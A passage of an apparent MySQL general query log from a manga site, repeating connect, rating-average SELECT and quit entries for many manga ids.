Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330661206 Quit 330661207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330661207 Quit 330661208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330661208 Quit 330661209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330661209 Quit 330661210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330661210 Quit 330661211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330661211 Quit 330661212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330661212 Quit 330661213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330661213 Quit 330661214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330661214 Quit 330661215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330661215 Quit 330661216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330661216 Quit 330661217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330661217 Quit 330661218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330661218 Quit 330661219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330661219 Quit 330661220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330661220 Quit 330661221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330661221 Quit 330661222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330661222 Quit 330661223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330661223 Quit 330661224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330661224 Quit 330661225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330661225 Quit 330661226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330661226 Quit 330661227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330661227 Quit 330661228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330661228 Quit 330661229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330661229 Quit 330661230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330661230 Quit 330661231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330661231 Quit 330661232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330661232 Quit 330661233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330661233 Quit 330661234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330661234 Quit 330661235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330661235 Quit 330661236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330661236 Quit 330661237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330661237 Quit 330661238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330661238 Quit 330661239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330661239 Quit 330661240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330661240 Quit 330661241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330661241 Quit 330661242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330661242 Quit 330661243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330661243 Quit 330661244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330661244 Quit 330661245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330661245 Quit 330661246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330661246 Quit 330661247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330661247 Quit 330661248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330661248 Quit 330661249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330661249 Quit 330661250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330661250 Quit 330661251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330661251 Quit 330661252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330661252 Quit 330661253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330661253 Quit 330661254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330661254 Quit 330661255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330661255 Quit 330661256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330661256 Quit 330661257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330661257 Quit 330661258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330661258 Quit 330661259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330661259 Quit 330661260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330661260 Quit 330661261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330661261 Quit 330661262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330661262 Quit 330661263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330661263 Quit 330661264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330661264 Quit 330661265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330661265 Quit 330661266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330661266 Quit 330661267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330661267 Quit 330661268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330661268 Quit 330661269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330661269 Quit 330661270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330661270 Quit 330661271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330661271 Quit 330661272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330661272 Quit 330661273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330661273 Quit 330661274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330661274 Quit 330661275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330661275 Quit 330661276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330661276 Quit 330661277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330661277 Quit 330661278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330661278 Quit 330661279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330661279 Quit 330661280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330661280 Quit 330661281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330661281 Quit 330661282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330661282 Quit 330661283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330661283 Quit 330661284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330661284 Quit 330661285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330661285 Quit 330661286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330661286 Quit 330661287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330661287 Quit 330661288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330661288 Quit 330661289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330661289 Quit 330661290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330661290 Quit 330661291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330661291 Quit 330661292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330661292 Quit 330661293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330661293 Quit 330661294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330661294 Quit 330661295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330661295 Quit 330661296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330661296 Quit 330661297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330661297 Quit 330661298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330661298 Quit 330661299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330661299 Quit 330661300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330661300 Quit 330661301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330661301 Quit 330661302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330661302 Quit 330661303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330661303 Quit 330661304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330661304 Quit 330661305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330661305 Quit 330661306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330661306 Quit 330661307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330661307 Quit 330661308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330661308 Quit 330661309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330661309 Quit 330661310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330661310 Quit 330661311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330661311 Quit 330661312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330661312 Quit 330661313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330661313 Quit 330661314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330661314 Quit 330661315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330661315 Quit 330661316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330661316 Quit 330661317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330661317 Quit 330661318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330661318 Quit 330661319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330661319 Quit 330661320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330661320 Quit 330661321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330661321 Quit 330661322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330661322 Quit 330661323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330661323 Quit 330661324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330661324 Quit 330661325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330661325 Quit 330661326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330661326 Quit 330661327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330661327 Quit 330661328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330661328 Quit 330661329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330661329 Quit 330661330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330661330 Quit 330661331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330661331 Quit 330661332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330661332 Quit 330661333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330661333 Quit 330661334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330661334 Quit 330661335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330661335 Quit 330661336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330661336 Quit 330661337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330661337 Quit 330661338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330661338 Quit 330661339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330661339 Quit 330661340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330661340 Quit 330661341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330661341 Quit 330661342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330661342 Quit 330661343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330661343 Quit 330661344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330661344 Quit 330661345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330661345 Quit 330661346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330661346 Quit 330661347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330661347 Quit 330661348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330661348 Quit 330661349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330661349 Quit 330661350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330661350 Quit 330661351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330661351 Quit 330661352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330661352 Quit 330661353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330661353 Quit 330661354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330661354 Quit 330661355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330661355 Quit 330661356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330661356 Quit 330661357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330661357 Quit 330661358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330661358 Quit 330661359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661359 Query select 